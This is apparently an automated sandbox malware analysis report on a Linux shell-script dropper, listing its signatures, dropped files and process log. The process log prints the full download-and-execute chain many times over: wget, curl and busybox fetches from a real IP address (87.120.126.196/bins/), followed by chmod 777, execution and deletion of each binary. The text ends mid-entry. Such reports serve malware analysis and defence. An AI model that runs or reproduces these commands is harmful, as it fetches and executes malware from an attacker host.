Malware Analysis Report

2025-05-28 20:51

Sample ID 241021-bwtrgs1hnd
Target 9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh
SHA256 9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b
Tags
defense_evasion discovery antivm
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b

Threat Level: Shows suspicious behavior

The file 9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion discovery antivm

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

System Network Configuration Discovery

Writes file to tmp directory

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-21 01:30

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-21 01:30

Reported

2024-10-21 01:32

Platform

ubuntu1804-amd64-20240729-en

Max time kernel

32s

Max time network

128s

Command Line

[/tmp/9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA /tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA N/A
N/A /tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz /tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz N/A
N/A /tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb /tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb N/A
N/A /tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S /tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S N/A
N/A /tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly /tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly N/A
N/A /tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m /tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m N/A
N/A /tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp /tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp N/A
N/A /tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ /tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ N/A
N/A /tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq /tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq N/A
N/A /tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N /tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N N/A
N/A /tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj /tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj N/A
N/A /tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp /tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp N/A
N/A /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 N/A
N/A /tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT /tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT N/A
N/A /tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly /tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly N/A
N/A /tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m /tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m N/A
N/A /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 N/A
N/A /tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT /tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT N/A
N/A /tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp /tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp N/A
N/A /tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ /tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ N/A
N/A /tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq /tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq N/A
N/A /tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N /tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N N/A
N/A /tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj /tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj N/A
N/A /tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp /tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp N/A
N/A /tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S /tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S N/A
N/A /tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA /tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA N/A
N/A /tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz /tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz N/A
N/A /tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb /tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A
N/A N/A /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj /usr/bin/curl N/A
File opened for modification /tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m /usr/bin/curl N/A
File opened for modification /tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj /usr/bin/curl N/A
File opened for modification /tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA /usr/bin/curl N/A
File opened for modification /tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA /usr/bin/curl N/A
File opened for modification /tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m /usr/bin/curl N/A
File opened for modification /tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly /usr/bin/curl N/A
File opened for modification /tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp /usr/bin/curl N/A
File opened for modification /tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz /usr/bin/curl N/A
File opened for modification /tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb /usr/bin/curl N/A
File opened for modification /tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz /usr/bin/curl N/A
File opened for modification /tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq /usr/bin/curl N/A
File opened for modification /tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp /usr/bin/curl N/A
File opened for modification /tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ /usr/bin/curl N/A
File opened for modification /tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp /usr/bin/curl N/A
File opened for modification /tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq /usr/bin/curl N/A
File opened for modification /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 /usr/bin/curl N/A
File opened for modification /tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT /usr/bin/curl N/A
File opened for modification /tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb /usr/bin/curl N/A
File opened for modification /tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly /usr/bin/curl N/A
File opened for modification /tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ /usr/bin/curl N/A
File opened for modification /tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT /usr/bin/curl N/A
File opened for modification /tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N /usr/bin/curl N/A
File opened for modification /tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp /usr/bin/curl N/A
File opened for modification /tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N /usr/bin/curl N/A
File opened for modification /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 /usr/bin/curl N/A
File opened for modification /tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S /usr/bin/curl N/A
File opened for modification /tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S /usr/bin/curl N/A

Processes

/tmp/9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh

[/tmp/9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]

/bin/chmod

[chmod 777 RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]

/tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA

[./RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]

/bin/rm

[rm RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]

/usr/bin/wget

[wget http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]

/bin/chmod

[chmod 777 zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]

/tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz

[./zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]

/bin/rm

[rm zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]

/usr/bin/wget

[wget http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]

/bin/chmod

[chmod 777 OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]

/tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb

[./OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]

/bin/rm

[rm OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]

/usr/bin/wget

[wget http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]

/bin/chmod

[chmod 777 Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]

/tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S

[./Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]

/bin/rm

[rm Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]

/usr/bin/wget

[wget http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]

/bin/chmod

[chmod 777 pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]

/tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly

[./pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]

/bin/rm

[rm pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]

/usr/bin/wget

[wget http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]

/bin/chmod

[chmod 777 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]

/tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m

[./2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]

/bin/rm

[rm 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]

/usr/bin/wget

[wget http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]

/bin/chmod

[chmod 777 Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]

/tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp

[./Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]

/bin/rm

[rm Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]

/usr/bin/wget

[wget http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]

/bin/chmod

[chmod 777 I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]

/tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ

[./I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]

/bin/rm

[rm I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]

/usr/bin/wget

[wget http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]

/bin/chmod

[chmod 777 zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]

/tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq

[./zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]

/bin/rm

[rm zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]

/usr/bin/wget

[wget http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]

/bin/chmod

[chmod 777 h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]

/tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N

[./h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]

/bin/rm

[rm h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]

/usr/bin/wget

[wget http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]

/bin/chmod

[chmod 777 tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]

/tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj

[./tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]

/bin/rm

[rm tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]

/usr/bin/wget

[wget http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]

/bin/chmod

[chmod 777 nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]

/tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp

[./nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]

/bin/rm

[rm nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]

/usr/bin/wget

[wget http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]

/bin/chmod

[chmod 777 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]

/tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67

[./271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]

/bin/rm

[rm 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]

/usr/bin/wget

[wget http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]

/bin/chmod

[chmod 777 xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]

/tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT

[./xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]

/bin/rm

[rm xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]

/usr/bin/wget

[wget http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]

/bin/chmod

[chmod 777 pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]

/tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly

[./pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]

/bin/rm

[rm pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]

/usr/bin/wget

[wget http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]

/bin/chmod

[chmod 777 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]

/tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m

[./2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]

/bin/rm

[rm 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]

/usr/bin/wget

[wget http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]

/bin/chmod

[chmod 777 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]

/tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67

[./271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]

/bin/rm

[rm 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]

/usr/bin/wget

[wget http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]

/bin/chmod

[chmod 777 xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]

/tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT

[./xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]

/bin/rm

[rm xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]

/usr/bin/wget

[wget http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]

/bin/chmod

[chmod 777 Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]

/tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp

[./Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]

/bin/rm

[rm Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]

/usr/bin/wget

[wget http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]

/bin/chmod

[chmod 777 I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]

/tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ

[./I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]

/bin/rm

[rm I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]

/usr/bin/wget

[wget http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]

/bin/chmod

[chmod 777 zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]

/tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq

[./zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]

/bin/rm

[rm zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]

/usr/bin/wget

[wget http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]

/bin/chmod

[chmod 777 h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]

/tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N

[./h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]

/bin/rm

[rm h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]

/usr/bin/wget

[wget http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]

/bin/chmod

[chmod 777 tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]

/tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj

[./tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]

/bin/rm

[rm tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]

/usr/bin/wget

[wget http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]

/bin/chmod

[chmod 777 nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]

/tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp

[./nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]

/bin/rm

[rm nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]

/usr/bin/wget

[wget http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]

/bin/chmod

[chmod 777 Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]

/tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S

[./Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]

/bin/rm

[rm Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]

/usr/bin/wget

[wget http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]

/bin/chmod

[chmod 777 RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]

/tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA

[./RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]

/bin/rm

[rm RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]

/usr/bin/wget

[wget http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]

/bin/busybox

